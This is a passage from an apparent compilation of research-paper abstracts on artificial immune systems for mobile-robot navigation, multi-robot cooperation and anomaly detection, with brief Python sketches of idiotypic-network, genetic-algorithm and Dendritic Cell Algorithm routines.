Mutation differs between the genetic algorithm (GA) and clonal selection: in the GA, mutation aims to improve the diversity of the population, while in clonal selection it aims to accelerate the convergence of the algorithm. The algorithm proposed in the paper takes less time and yields better path-planning results than the GA. The efficiency of the proposed method is validated by simulation in MATLAB. --- paper_title: A hybrid immune evolutionary computation based on immunity and clonal selection for concurrent mapping and localization paper_content: This paper addresses the problem of Concurrent Mapping and Localization (CML) by means of a hybrid immune evolutionary computation based on immunity and clonal selection for a mobile robot. An immune operator, a vaccination operator, is designed in the algorithm. The experiment results of a real mobile robot show that the computational expensiveness of the algorithm in this paper is less than other algorithms and the maps obtained are very accurate. --- paper_title: An evolutionary algorithm with population immunity and its application on autonomous robot control paper_content: The natural immune system is an important resource full of inspirations for the theory researchers and the engineering developers to design some powerful information processing methods aiming at difficult problems. Based on this consideration, a novel optimal-searching algorithm, the immune mechanism based evolutionary algorithm - IMEA, is proposed for the purpose of finding an optimal/quasi-optimal solution in a multi-dimensional space. Different from the ordinary evolutionary algorithms, on one hand, due to the long-term memory, IMEA has a better capability of learning from its experience, and on the other hand, with the clonal selection, it is able to keep from the premature convergence of population. With the simulation on autonomous robot control, it is proved that IMEA is good at the task of adaptive adjustment (offline), and it can improve the robot's capability of reinforcement learning, so as to make itself able to sense its surrounding dynamic environment. --- paper_title: Realization of cooperative strategies and swarm behavior in distributed autonomous robotic systems using artificial immune system paper_content: In this paper, we propose a method of cooperative control (T-cell modeling) and selection of group behavior strategy (B-cell modeling) based on the immune system in a distributed autonomous robotic system (DARS). The immune system is a living body's self-protection and self-maintenance system. These features can be applied to decision making of optimal swarm behavior in a dynamically changing environment. To apply the immune system to DARS, a robot is regarded as a B-cell, each environmental condition as an antigen, a behavior strategy as an antibody and control parameter as a T-cell respectively. When the environmental condition changes, a robot selects an appropriate behavior strategy, and its behavior strategy is stimulated and suppressed by other robots using communication. Finally, the most stimulated strategy is adopted as the swarm behavior strategy. This control scheme is based on clonal selection and idiotopic network hypothesis.
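The DARS strategy-selection entry above, and most of the idiotypic-network controllers that follow, rest on the same concentration dynamics: each antibody (behaviour or strategy) gains concentration from antigen affinity and stimulation by other antibodies, and loses it through suppression and natural death, with the most concentrated antibody winning the arbitration. The sketch below shows one discrete-time update of that kind; the stimulation and suppression matrices and the coefficients k_supp, k_death and dt are illustrative assumptions rather than values taken from any single cited paper.

import math

def update_concentrations(conc, antigen_affinity, stim, supp,
                          k_supp=0.8, k_death=0.1, dt=0.1):
    """One idiotypic-network update of antibody concentrations.
    conc[i]             current concentration of antibody (behaviour) i
    antigen_affinity[i] match between behaviour i and the current sensor state
    stim[i][j]          stimulation of antibody i by antibody j
    supp[i][j]          suppression of antibody i by antibody j"""
    n = len(conc)
    new_conc = []
    for i in range(n):
        stimulation = sum(stim[i][j] * conc[j] for j in range(n))
        suppression = sum(supp[i][j] * conc[j] for j in range(n))
        growth = (stimulation - k_supp * suppression
                  + antigen_affinity[i] - k_death) * conc[i]
        a = conc[i] + dt * growth
        # Squash to keep concentrations bounded, as most robot controllers do.
        new_conc.append(1.0 / (1.0 + math.exp(0.5 - a)))
    return new_conc

def select_behaviour(conc):
    # Winner-takes-all arbitration: the most concentrated antibody acts.
    return max(range(len(conc)), key=lambda i: conc[i])

A controller would recompute antigen_affinity from the sensors at every step, run the update, and execute the winning behaviour.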
--- paper_title: Immunoid: An Immunological Approach to Decentralized Behavoir Arbitration of Autonomous Mobile Robots paper_content: Conventional artificial intelligent (AI) system have been criticized for its brittleness under hostile/dynamic changing environments. Therefore, recently much attention has been focused on the reactive planning systems such as behavior-based AI. However, in the behavior-based AI approaches, how to construct a mechanism that realizes adequate arbitration among competence modules is still an open question. In this paper, we propose a new decentralized consensus-making system inspired from the biological immune system. And we apply our proposed method to behavior arbitration of an autonomous mobile robot as a practical example. To verify the feasibility of our method, we carry out some experiments. In addition, we propose an adaptation mechanism, and try to construct a suitable immune network for adequate action selection. --- paper_title: Emergent construction of behavior arbitration mechanism based on the immune system paper_content: We have been investigating a new behavior arbitration mechanism based on the biological immune system. The behavior arbitration mechanism and the biological immune system share certain similarities since both systems deal with various sensory inputs (antigens) through interactions among multiple competence modules (lymphocytes and/or antibodies). We have demonstrated the flexible arbitration abilities of our proposed method, however, we have not previously shown a solution to the problem: how do we prepare an appropriate repertoire of competence modules? In this paper, in order to construct an appropriate immune network without human intervention, we try to incorporate an off-line metadynamics function into our previously proposed mechanism. The metadynamics function is an adaptation realized by varying the structure of the immune network. To accomplish this function, we use a genetic algorithm with a devised crossover operator. Finally, we verify our method by carrying out simulations. --- paper_title: Decentralized control system for autonomous navigation based on an evolved artificial immune network paper_content: This paper investigates an autonomous control system of a mobile robot based on the immune network theory. The immune network navigates the robot to solve a multiobjective task, namely, garbage collection: the robot must find and collect garbage, while it establishes a trajectory without colliding with obstacles, and return to the base before it runs out of energy. Each network node corresponds to a specific antibody and describes a particular control action for the robot. The antigens are the current state of the robot, read from a set of internal and external sensors. The network dynamics corresponds to the variation of antibody concentration levels, which change according to both mutual interaction of antibody nodes and of antibodies and antigens. It is proposed an evolutionary mechanism to determine the network configuration, that is, the parameters that define those interactions. Simulation results suggest that the proposal presented is very promising. --- paper_title: Plan on Obstacle-Avoiding Path for Mobile Robots Based on Artificial Immune Algorithm paper_content: This paper aims to plan the obstacle-avoiding path for mobile robots based on the Artificial Immune Algorithm (AIA) developed from the immune principle; AIA has a strong parallel processing, learning and memorizing ability. 
This study will design and control a mobile robot within a limited special scale. Through a research method based on the AIA, this study will find out the optimum obstacle-avoiding path. The main purpose of this study is to make it possible for the mobile robot to reach the target object safely and successfully fulfill its task through optimal path and with minimal rotation angle and best learning efficiency. In the end, through the research method proposed and the experimental results, it will become obvious that the application of the AIA after improvement in the obstacle-avoiding path planning for mobile robots is really effective. --- paper_title: A robot with a decentralized consensus-making mechanism based on the immune system paper_content: In recent years much attention has been focused on behavior-based artificial intelligence (AI), which has already demonstrated its robustness and flexibility against dynamically changing world. However, in this approach, the followings have not yet been resolved: how do we construct an appropriate arbitration mechanism, and how do we prepare appropriate competence modules. In this paper, to overcome these problems, we propose a new decentralised consensus-making system inspired by the biological immune system. And we apply our proposed method to behavior arbitration for an autonomous mobile robot, namely garbage collecting problem that takes into account the concept of self-sufficiency. To verify the feasibility of our method, we carry out some simulations. In addition, we investigate two types of adaptation mechanisms, and try to evolve the proposed artificial immune network using reinforcement signals. --- paper_title: Immune network control for stigmergy based foraging behaviour of autonomous mobile robots paper_content: The paper presents a series of experiments in a simulated environment where two autonomous mobile robots gather randomly distributed objects and cluster them on a pile. The co-ordination of the robots' movements is achieved through stigmergy (an indirect form of communication through the environment). The random moves, necessary for stigmergy based foraging behaviour, make the task solution a time consuming process. In order to speed up the foraging behaviour, the immune network robot control is proposed. Stigmergic principles are coded in two artificial immune networks—for a collision free goal following behaviour and for an object picking up/dropping behaviour. Simulations confirm the improved performance of the foraging behaviour under the proposed immune network control. Copyright © 2006 John Wiley & Sons, Ltd. --- paper_title: Artificial Immune System based Cooperative Strategies for Robot Soccer Competition paper_content: This study proposes an immune network based cooperative strategy for robot soccer systems. The strategy enables robots to select proper behaviors from `shot', `pass', `kick', `chase', `track', and `guard'. In addition, the proposed layered immune network achieves cooperation and coordination between each robot. The proposed architecture is evaluated on the SimuroSot Middle league, a 5-vs-5 simulation platform in FIRA. --- paper_title: An immune learning classifier network for autonomous navigation paper_content: This paper proposes a non-parametric hybrid system for autonomous navigation combining the strengths of learning classifier systems, evolutionary algorithms, and an immune network model. The system proposed is basically an immune network of classifiers, named CLARINET. 
CLARINET has three degrees of freedom: the attributes that define the network cells (classifiers) are dynamically adjusted to a changing environment; the network connections are evolved using an evolutionary algorithm; and the concentration of network nodes is varied following a continuous dynamic model of an immune network. CLARINET is described in detail, and the resultant hybrid system demonstrated effectiveness and robustness in the experiments performed, involving the computational simulation of robotic autonomous navigation. --- paper_title: AIS Based Robot Navigation in a Rescue Scenario paper_content: An architecture for a robot control is proposed which is based on the requirements from the RoboCup and AAAI Rescue Robot Competition. An artificial immune system comprises the core component. The suitability of this architecture for the competition and related scenarios, including the modelling of the environment, was verified by simulation. --- paper_title: The danger model: A renewed sense of self paper_content: For over 50 years immunologists have based their thoughts, experiments, and clinical treatments on the idea that the immune system functions by making a distinction between self and nonself. Although this paradigm has often served us well, years of detailed examination have revealed a number of inherent problems. This Viewpoint outlines a model of immunity based on the idea that the immune system is more concerned with entities that do damage than with those that are foreign. --- paper_title: Two-Timescale Learning Using Idiotypic Behaviour Mediation For A Navigating Mobile Robot paper_content: A combined Short-Term Learning (STL) and Long-Term Learning (LTL) approach to solving mobile-robot navigation problems is presented and tested in both the real and virtual domains. The LTL phase consists of rapid simulations that use a Genetic Algorithm to derive diverse sets of behaviours, encoded as variable sets of attributes, and the STL phase is an idiotypic Artificial Immune System. Results from the LTL phase show that sets of behaviours develop very rapidly, and significantly greater diversity is obtained when multiple autonomous populations are used, rather than a single one. The architecture is assessed under various scenarios, including removal of the LTL phase and switching off the idiotypic mechanism in the STL phase. The comparisons provide substantial evidence that the best option is the inclusion of both the LTL phase and the idiotypic system. In addition, this paper shows that structurally different environments can be used for the two phases without compromising transferability. --- paper_title: An immune learning classifier network for autonomous navigation paper_content: This paper proposes a non-parametric hybrid system for autonomous navigation combining the strengths of learning classifier systems, evolutionary algorithms, and an immune network model. The system proposed is basically an immune network of classifiers, named CLARINET. CLARINET has three degrees of freedom: the attributes that define the network cells (classifiers) are dynamically adjusted to a changing environment; the network connections are evolved using an evolutionary algorithm; and the concentration of network nodes is varied following a continuous dynamic model of an immune network. CLARINET is described in detail, and the resultant hybrid system demonstrated effectiveness and robustness in the experiments performed, involving the computational simulation of robotic autonomous navigation. 
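The two-timescale scheme above encodes each behaviour as a set of attributes and uses a genetic algorithm in the long-term phase to evolve whole behaviour sets before the idiotypic short-term phase takes over; CLARINET similarly evolves its network with an evolutionary algorithm. The fragment below sketches such a long-term loop under simple assumptions: behaviours are fixed-length attribute dictionaries, fitness comes from a caller-supplied simulation, and single-point crossover plus per-attribute Gaussian mutation are used. The attribute names and operators are hypothetical, not those of the cited papers.

import random

# Illustrative attribute ranges for one behaviour (hypothetical names).
ATTRIBUTE_RANGES = {
    "speed":        (0.0, 1.0),
    "turn_gain":    (0.0, 2.0),
    "range_thresh": (0.05, 0.5),
}

def random_behaviour():
    return {k: random.uniform(lo, hi) for k, (lo, hi) in ATTRIBUTE_RANGES.items()}

def mutate(behaviour, rate=0.1):
    child = dict(behaviour)
    for k, (lo, hi) in ATTRIBUTE_RANGES.items():
        if random.random() < rate:
            child[k] = min(hi, max(lo, child[k] + random.gauss(0.0, 0.1 * (hi - lo))))
    return child

def crossover(a, b):
    keys = list(ATTRIBUTE_RANGES)
    cut = random.randrange(1, len(keys))
    return {k: (a[k] if i < cut else b[k]) for i, k in enumerate(keys)}

def evolve_behaviour_set(evaluate, set_size=6, pop_size=20, generations=50):
    """evaluate: callable scoring a list of behaviours in simulation (higher is better)."""
    pop = [[random_behaviour() for _ in range(set_size)] for _ in range(pop_size)]
    for _ in range(generations):
        ranked = sorted(pop, key=evaluate, reverse=True)
        parents = ranked[: pop_size // 2]
        children = []
        while len(children) < pop_size - len(parents):
            pa, pb = random.sample(parents, 2)
            children.append([mutate(crossover(x, y)) for x, y in zip(pa, pb)])
        pop = parents + children
    return max(pop, key=evaluate)

The best evolved set would then seed the short-term idiotypic phase, whose concentration dynamics follow the update sketched earlier.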
--- paper_title: Genetic-Algorithm Seeding Of Idiotypic Networks For Mobile-Robot Navigation paper_content: Robot-control designers have begun to exploit the properties of the human immune system in order to ::: produce dynamic systems that can adapt to complex, varying, real-world tasks. Jerne’s idiotypic-network theory has proved the most popular artificial-immune-system (AIS) method for incorporation into behaviour-based robotics, since idiotypic selection produces highly adaptive responses. However, previous efforts have mostly focused on evolving the network connections and have often worked with a single, preengineered set of behaviours, limiting variability. This paper describes a method for encoding behaviours as a variable set of attributes, and shows that when the encoding is used with a genetic algorithm (GA), multiple sets of diverse behaviours can develop naturally and rapidly, providing much greater scope for flexible behaviour-selection. The algorithm is tested extensively with a simulated e-puck robot that navigates around a maze by tracking colour. Results show that highly successful behaviour sets can be generated within about 25 minutes, and that much greater diversity can be obtained when multiple autonomous populations are used, rather than a single one. --- paper_title: Artificial immune network-based cooperative control in collective autonomous mobile robots paper_content: In this paper, we propose a method of cooperative control based on immune system in distributed autonomous robotic system (DARS). Immune system is living body's self-protection and self-maintenance system. Thus these features can be applied to decision making of optimal swarm behavior in dynamically changing environment. For the purpose of applying the immune system to DARS, a robot is regarded as a B lymphocyte (B cell), each environmental condition as an antigen and a behavior strategy as an antibody respectively. The executing process of proposed method is as follows: when the environmental condition changes, a robot selects an appropriate behavior strategy, and its behavior strategy is stimulated and suppressed by other robot using communication. Finally, such stimulated strategy is adopted as a swarm behavior strategy. This control scheme is based on clonal selection and idiotopic network hypothesis, and it is used for decision making of an optimal swarm strategy. --- paper_title: Realization of cooperative strategies and swarm behavior in distributed autonomous robotic systems using artificial immune system paper_content: In this paper, we propose a method of cooperative control (T-cell modeling) and selection of group behavior strategy (B-cell modeling) based on the immune system in a distributed autonomous robotic system (DARS). The immune system is a living body's self-protection and self-maintenance system. These features can be applied to decision making of optimal swarm behavior in a dynamically changing environment. To apply the immune system to DARS, a robot is regarded as a B-cell, each environmental condition as an antigen, a behavior strategy as an antibody and control parameter as a T-cell respectively. When the environmental condition changes, a robot selects an appropriate behavior strategy, and its behavior strategy is stimulated and suppressed by other robots using communication. Finally, the most stimulated strategy is adopted as the swarm behavior strategy. This control scheme is based on clonal selection and idiotopic network hypothesis. 
It is used for decision making of the optimal swarm strategy. By T-cell modeling, the adaptation ability of the robot is enhanced in dynamic environments. --- paper_title: Applying synthesized immune networks hypothesis to mobile robots paper_content: Based on the analogies between multi autonomous robots system (MARS) and immune system, a synthesized immune networks hypothesis and the algorithm to solve the route planning and cooperation problem on MARS are proposed. The route planning and cooperation problem is transformed to the interaction mechanism among antibody, antigen and small-scaled immune networks. The pursuit problem is used to validate the hypothesis. Simulation results suggest that the proposal is promising. --- paper_title: Plan on Obstacle-Avoiding Path for Mobile Robots Based on Artificial Immune Algorithm paper_content: This paper aims to plan the obstacle-avoiding path for mobile robots based on the Artificial Immune Algorithm (AIA) developed from the immune principle; AIA has a strong parallel processing, learning and memorizing ability. This study will design and control a mobile robot within a limited special scale. Through a research method based on the AIA, this study will find out the optimum obstacle-avoiding path. The main purpose of this study is to make it possible for the mobile robot to reach the target object safely and successfully fulfill its task through optimal path and with minimal rotation angle and best learning efficiency. In the end, through the research method proposed and the experimental results, it will become obvious that the application of the AIA after improvement in the obstacle-avoiding path planning for mobile robots is really effective. --- paper_title: An immunological approach to mobile robot reactive navigation paper_content: In this paper, a reactive immune network (RIN) is proposed and employed for mobile robot navigation within unknown environments. Rather than building a detailed mathematical model of artificial immune systems, this study tries to explore the principle in an immune network focusing on its self-organization, adaptive learning capability, and immune feedback. In addition, an adaptive virtual target method is integrated to solve the local minima problem in navigation. Several trapping situations designed by the early researchers are adopted to evaluate the performance of the proposed architecture. Simulation results show that the mobile robot is capable of avoiding obstacles, escaping traps, and reaching the goal efficiently and effectively. --- paper_title: Behavior-based intelligent mobile robot using an immunized reinforcement adaptive learning mechanism paper_content: Abstract In this paper, a novel immunized reinforcement adaptive learning mechanism employing a behavior-based knowledge and the on-line adapting capabilities of the immune system is proposed and applied to an intelligent mobile robot. Rather than building a detailed mathematical model of immune systems, we try to explore principles in the immune system focusing on its self-organization, adaptive capability and immune memory. Two levels of the immune system, underlying the ‘micro’ level of cell interactions, and emergent ‘macro’ level of the behavior of the system are investigated. To evaluate the proposed immunized architecture, a ‘food foraging work’ simulation environment containing a mobile robot, foods, with/without obstacles is created to simulate the real world. 
The simulation results validate several significant characteristics of the immunized architecture: adaptability, learning, self-organizing, and stable ecological niche approaching. --- paper_title: Artificial Immune System based Cooperative Strategies for Robot Soccer Competition paper_content: This study proposes an immune network based cooperative strategy for robot soccer systems. The strategy enables robots to select proper behaviors from `shot', `pass', `kick', `chase', `track', and `guard'. In addition, the proposed layered immune network achieves cooperation and coordination between each robot. The proposed architecture is evaluated on the SimuroSot Middle league, a 5-vs-5 simulation platform in FIRA. --- paper_title: Mobile Robot Path Planning Based on Artificial Immune Algorithm paper_content: * Corresponding author Email: [email protected] Abstract - This paper studies the application of artificial immune algorithm to mobile robot path planning inside a specified environment in real time. The biological immune system is firstly analyzed in a relatively deeper and all-sided point of view reflecting the fresh research in biology. Second, the motion characteristic of the car-like autonomous mobile robot is also analyzed. An immunity algorithm adapting capabilities of the artificial immune system is proposed and enable robot to reach the target object safely and successfully fulfill its task through optimal path and with minimal rotation angle efficiency. Finally, the simulation experiment results demonstrate that the proposed AIA based path plan approach behaves more successfully. --- paper_title: Research on Cooperative Strategies of Soccer Robots Based on Artificial Immune System paper_content: For one agent, the proper selection of its own actions or strategies is one key to the multi-agent system. A new method is presented to select actions cooperatively for soccer robots, which is regarded as a benchmark of multi-agent system. The perfect character of artificial immune system is made full use to improve the strategy of the soccer robot, dealing with information of the environment as antigen, certain action as antibody. Like biological immune system, the robot selects action (antibody) according to its own surroundings (antigen) to make robots complete their mission properly and cooperatively. Experiment results indicate the feasibility and effectiveness of the method. --- paper_title: An artificial immune system approach to mobile sensor networks and mine detection paper_content: The human immune system and its ability to continually develop and learn has been studied for many years. Its capacity to recognize its own cells (self), as well as those that pose a threat to the body's homeostasis (non-self) has lead to the creation of many algorithms that try to mimic this behavior. One of these algorithms is the artificial immune system (AIS). The foundation of AIS depends on the existence of both sensor and communication ranges (assumed circles) with which a single agent can collect and convey information to other agents within the range. It is the purpose of this paper to present a solution to the mine detection problem using cooperative mobile robots equipped with sensory and communication capabilities which allow the AIS approach to be utilized --- paper_title: Application of artificial immune system based intelligent multi agent model to a mine detection problem paper_content: Biological systems are sophisticated and intelligent information processing systems. 
They have inspired scientists and engineers to solve complex computational and information processing tasks. This paper presents a novel artificial immune system based intelligent multi agent model named AISIMAM. The model involves the behavioral management of artificial intelligence, namely multi agent systems and artificial immune systems. This paper outlines AISIMAM, concentrates on the mine detection application and discusses the results. --- paper_title: Control of the distributed autonomous robotic system based on the biologically inspired immunological architecture paper_content: In this paper, we propose a new algorithm to control a distributed autonomous robotic system under dynamically changing environment based on immunological interaction between robots. Our algorithm can organize the robot population for dynamically changing multiple works. At first, we designed a control architecture for a multiple robotic system based on B-cell (which is main agent of immune system) interaction. Immune system has various kinds of B-cells, and B-cell interaction can organize its population balance against dynamically changing environment. We set the analogy between distributed autonomous robotic system and biological immune system. We verified the performance of our algorithm by computer simulation. As a simulation example there is considered the transportation of multiple objects to multiple locations against a deadline, with time-varying demand. --- paper_title: Artificial Dendritic Cells: Multi-faceted Perspectives paper_content: Dendritic cells are the crime scene investigators of the human immune system. Their function is to correlate potentially anomalous invading entities with observed damage to the body. The detection of such invaders by dendritic cells results in the activation of the adaptive immune system, eventually leading to the removal of the invader from the host body. This mechanism has provided inspiration for the development of a novel bio-inspired algorithm, the Dendritic Cell Algorithm. This algorithm processes information at multiple levels of resolution, resulting in the creation of information granules of variable structure. In this chapter we examine the multi-faceted nature of immunology and how research in this field has shaped the function of the resulting Dendritic Cell Algorithm. A brief overview of the algorithm is given in combination with the details of the processes used for its development. The chapter is concluded with a discussion of the parallels between our understanding of the human immune system and how such knowledge influences the design of artificial immune systems. --- paper_title: A goalkeeper strategy in robot soccer based on Danger Theory paper_content: Artificial Immune Systems (AIS) have been successfully modeled and implemented in several engineering applications. In this work, a goalkeeper strategy in robot soccer based on Danger Theory is proposed. Danger Theory is a recent immune theory which has not been widely applied so far. The proposed strategy is implemented and evaluated using middle league SIMUROSOT from FIRA. Experiments carried out yielded promising results. --- paper_title: Articulation and Clarification of the Dendritic Cell Algorithm paper_content: The Dendritic Cell algorithm (DCA) is inspired by recent work in innate immunity. In this paper a formal description of the DCA is given. The DCA is described in detail, and its use as an anomaly detector is illustrated within the context of computer security. 
A port scan detection task is performed to substantiate the influence of signal selection on the behaviour of the algorithm. Experimental results provide a comparison of differing input signal mappings. --- paper_title: Danger Theory: The Link between AIS and IDS? paper_content: We present ideas about creating a next generation Intrusion Detection System based on the latest immunological theories. The central challenge with computer security is determining the difference between normal and potentially harmful activity. For half a century, developers have protected their systems by coding rules that identify and block specific events. However, the nature of current and future threats in conjunction with ever larger IT systems urgently requires the development of automated and adaptive defensive tools. A promising solution is emerging in the form of Artificial Immune Systems. The Human Immune System can detect and defend against harmful and previously unseen invaders, so can we not build a similar Intrusion Detection System for our computers. --- paper_title: The Deterministic Dendritic Cell Algorithm paper_content: The Dendritic Cell Algorithm is an immune-inspired algorithm originally based on the function of natural dendritic cells. The original instantiation of the algorithm is a highly stochastic algorithm. While the performance of the algorithm is good when applied to large real-time datasets, it is difficult to analyse due to the number of random-based elements. In this paper a deterministic version of the algorithm is proposed, implemented and tested using a port scan dataset to provide a controllable system. This version consists of a controllable amount of parameters, which are experimented with in this paper. In addition the effects are examined of the use of time windows and variation on the number of cells, both which are shown to influence the algorithm. Finally a novel metric for the assessment of the algorithms output is introduced and proves to be a more sensitive metric than the metric used with the original Dendritic Cell Algorithm. --- paper_title: The Application of a Dendritic Cell Algorithm to a Robotic Classifier paper_content: The dendritic cell algorithm is an immune-inspired technique for processing time-dependant data. Here we propose it as a possible solution for a robotic classification problem. The dendritic cell algorithm is implemented on a real robot and an investigation is performed into the effects of varying the migration threshold median for the cell population. The algorithm performs well on a classification task with very little tuning. Ways of extending the implementation to allow it to be used as a classifier within the field of robotic security are suggested. --- paper_title: Multi-robot Exploration Based on Market Approach and Immune Optimizing Strategy paper_content: A multi-robot system is used to explore an environment and create a map based on market approach. Data fusion is performed using Bayes theorem and then the local maps are updated. A diffusivity concept is defined to describe the robots' extent apart from one another. The immune optimizing strategy is introduced to select goal points since it is a problem of optimized combination. In order to minimize repeated coverage and improve the exploration efficiency, the evaluation function considers the cost, revenue and diffusivity. Simulation examples show that the proposed method is effective for the stated problem and the immune optimizing strategy is more efficient than other strategies. 
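The dendritic-cell entries above share one signal-processing core: each cell accumulates weighted sums of PAMP, danger and safe signals into a costimulation value and a context value, migrates once costimulation passes its threshold, and the antigens it carried are then labelled by the fraction of presentations that occurred in a mature (anomalous) context. The sketch below follows the deterministic formulation in spirit only; the weight values and thresholds are illustrative assumptions, and the simplification that every cell samples every antigen differs from the sampling used in the cited papers.

def dca(stream, weights=None, thresholds=(5.0, 15.0), n_cells=10):
    """Simplified deterministic Dendritic Cell Algorithm.
    stream: iterable of (antigen_id, pamp, danger, safe) tuples.
    Returns antigen_id -> MCAV (fraction of presentations in a mature context)."""
    if weights is None:
        # (w_pamp, w_danger, w_safe) for costimulation (csm) and context (k).
        weights = {"csm": (2.0, 1.0, 2.0), "k": (2.0, 1.0, -2.0)}
    lo, hi = thresholds
    cells = [{"thr": lo + (hi - lo) * i / max(1, n_cells - 1),
              "csm": 0.0, "k": 0.0, "antigens": []} for i in range(n_cells)]
    mature = {}   # antigen_id -> presentations in a mature context
    total = {}    # antigen_id -> total presentations

    for antigen, pamp, danger, safe in stream:
        for cell in cells:
            cell["antigens"].append(antigen)
            cell["csm"] += sum(w * s for w, s in zip(weights["csm"], (pamp, danger, safe)))
            cell["k"]   += sum(w * s for w, s in zip(weights["k"],   (pamp, danger, safe)))
            if cell["csm"] >= cell["thr"]:
                context_mature = cell["k"] > 0.0
                for a in cell["antigens"]:
                    total[a] = total.get(a, 0) + 1
                    if context_mature:
                        mature[a] = mature.get(a, 0) + 1
                cell.update(csm=0.0, k=0.0, antigens=[])   # reset the migrated cell
    return {a: mature.get(a, 0) / total[a] for a in total}

Spreading the migration thresholds across the cell population is what gives the algorithm its built-in time windows: cells with low thresholds react to short bursts of signal, cells with high thresholds integrate over longer periods.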
--- paper_title: Real-time obstacle avoidance for manipulators and mobile robots paper_content: This paper presents a unique real-time obstacle avoidance approach for manipulators and mobile robots based on the "artificial potential field" concept. In this approach, collision avoidance, traditionally considered a high level planning problem, can be effectively distributed between different levels of control, allowing real-time robot operations in a complex environment. We have applied this obstacle avoidance scheme to robot arm using a new approach to the general problem of real-time manipulator control. We reformulated the manipulator control problem as direct control of manipulator motion in operational space-the space in which the task is originally described-rather than as control of the task's corresponding joint space motion obtained only after geometric and kinematic transformation. This method has been implemented in the COSMOS system for a PUMA 560 robot. Using visual sensing, real-time collision avoidance demonstrations on moving obstacles have been performed. --- paper_title: Decentralized control system for autonomous navigation based on an evolved artificial immune network paper_content: This paper investigates an autonomous control system of a mobile robot based on the immune network theory. The immune network navigates the robot to solve a multiobjective task, namely, garbage collection: the robot must find and collect garbage, while it establishes a trajectory without colliding with obstacles, and return to the base before it runs out of energy. Each network node corresponds to a specific antibody and describes a particular control action for the robot. The antigens are the current state of the robot, read from a set of internal and external sensors. The network dynamics corresponds to the variation of antibody concentration levels, which change according to both mutual interaction of antibody nodes and of antibodies and antigens. It is proposed an evolutionary mechanism to determine the network configuration, that is, the parameters that define those interactions. Simulation results suggest that the proposal presented is very promising. --- paper_title: Plan on Obstacle-Avoiding Path for Mobile Robots Based on Artificial Immune Algorithm paper_content: This paper aims to plan the obstacle-avoiding path for mobile robots based on the Artificial Immune Algorithm (AIA) developed from the immune principle; AIA has a strong parallel processing, learning and memorizing ability. This study will design and control a mobile robot within a limited special scale. Through a research method based on the AIA, this study will find out the optimum obstacle-avoiding path. The main purpose of this study is to make it possible for the mobile robot to reach the target object safely and successfully fulfill its task through optimal path and with minimal rotation angle and best learning efficiency. In the end, through the research method proposed and the experimental results, it will become obvious that the application of the AIA after improvement in the obstacle-avoiding path planning for mobile robots is really effective. --- paper_title: A robot with a decentralized consensus-making mechanism based on the immune system paper_content: In recent years much attention has been focused on behavior-based artificial intelligence (AI), which has already demonstrated its robustness and flexibility against dynamically changing world. 
However, in this approach, the followings have not yet been resolved: how do we construct an appropriate arbitration mechanism, and how do we prepare appropriate competence modules. In this paper, to overcome these problems, we propose a new decentralised consensus-making system inspired by the biological immune system. And we apply our proposed method to behavior arbitration for an autonomous mobile robot, namely garbage collecting problem that takes into account the concept of self-sufficiency. To verify the feasibility of our method, we carry out some simulations. In addition, we investigate two types of adaptation mechanisms, and try to evolve the proposed artificial immune network using reinforcement signals. --- paper_title: An immune learning classifier network for autonomous navigation paper_content: This paper proposes a non-parametric hybrid system for autonomous navigation combining the strengths of learning classifier systems, evolutionary algorithms, and an immune network model. The system proposed is basically an immune network of classifiers, named CLARINET. CLARINET has three degrees of freedom: the attributes that define the network cells (classifiers) are dynamically adjusted to a changing environment; the network connections are evolved using an evolutionary algorithm; and the concentration of network nodes is varied following a continuous dynamic model of an immune network. CLARINET is described in detail, and the resultant hybrid system demonstrated effectiveness and robustness in the experiments performed, involving the computational simulation of robotic autonomous navigation. --- paper_title: An Information-Theoretic Approach for Clonal Selection Algorithms paper_content: In this research work a large set of the classical numerical functions were taken into account in order to understand both the search capability and the ability to escape from a local optimal of a clonal selection algorithm, called i-CSA. The algorithm was extensively compared against several variants of Differential Evolution (DE) algorithm, and with some typical swarm intelligence algorithms. The obtained results show as i-CSA is effective in terms of accuracy, and it is able to solve large-scale instances of well-known benchmarks. Experimental results also indicate that the algorithm is comparable, and often outperforms, the compared nature-inspired approaches. From the experimental results, it is possible to note that a longer maturation of a B cell, inside the population, assures the achievement of better solutions; the maturation period affects the diversity and the effectiveness of the immune search process on a specific problem instance. To assess the learning capability during the evolution of the algorithm three different relative entropies were used: Kullback-Leibler, Renyi generalized and Von Neumann divergences. The adopted entropic divergences show a strong correlation between optima discovering, and high relative entropy values. --- paper_title: A hybrid immune evolutionary computation based on immunity and clonal selection for concurrent mapping and localization paper_content: This paper addresses the problem of Concurrent Mapping and Localization(CML) by means of a hybrid immune evolutionary computation based on immunity and clonal selection for a mobile robot. An immune operator, a vaccination operator, is designed in the algorithm. 
The experiment results of a real mobile robot show that the computational expensiveness of the algorithm in this paper is less than other algorithms and the maps obtained are very accurate. --- paper_title: An evolutionary algorithm with population immunity and its application on autonomous robot control paper_content: The natural immune system is an important resource full of inspirations for the theory researchers and the engineering developers to design some powerful information processing methods aiming at difficult problems. Based on this consideration, a novel optimal-searching algorithm, the immune mechanism based evolutionary algorithm - IMEA, is proposed for the purpose of finding an optimal/quasi-optimal solution in a multi-dimensional space. Different from the ordinary evolutionary algorithms, on one hand, due to the long-term memory, IMEA has a better capability of learning from its experience, and on the other hand, with the clonal selection, it is able to keep from the premature convergence of population. With the simulation on autonomous robot control, it is proved that IMEA is good at the task of adaptive adjustment (offline), and it can improve the robot's capability of reinforcement learning, so as to make itself able to sense its surrounding dynamic environment. --- paper_title: Improved Pattern Recognition with Artificial Clonal Selection? paper_content: In this paper, we examine the clonal selection algorithm CLONALG and the suggestion that it is suitable for pattern recognition. CLONALG is tested over a series of binary character recognition tasks and its performance compared to a set of basic binary matching algorithms. A number of enhancements are made to the algorithm to improve its performance and the classification tests are repeated. Results show that given enough data CLONALG can successfully classify previously unseen patterns and that adjustments to the existing algorithm can improve performance. --- paper_title: Theoretical advances in artificial immune systems paper_content: Artificial immune systems (AIS) constitute a relatively new area of bio-inspired computing. Biological models of the natural immune system, in particular the theories of clonal selection, immune networks and negative selection, have provided the inspiration for AIS algorithms. Moreover, such algorithms have been successfully employed in a wide variety of different application areas. However, despite these practical successes, until recently there has been a dearth of theory to justify their use. In this paper, the existing theoretical work on AIS is reviewed. After the presentation of a simple example of each of the three main types of AIS algorithm (that is, clonal selection, immune network and negative selection algorithms respectively), details of the theoretical analysis for each of these types are given. Some of the future challenges in this area are also highlighted. --- paper_title: The 'complete' idiotype network is an absurd immune system. paper_content: Idiotypic networks have attained the status of unavoidable necessities in the regulation of immune responses. In this article Rod Langman and Mel 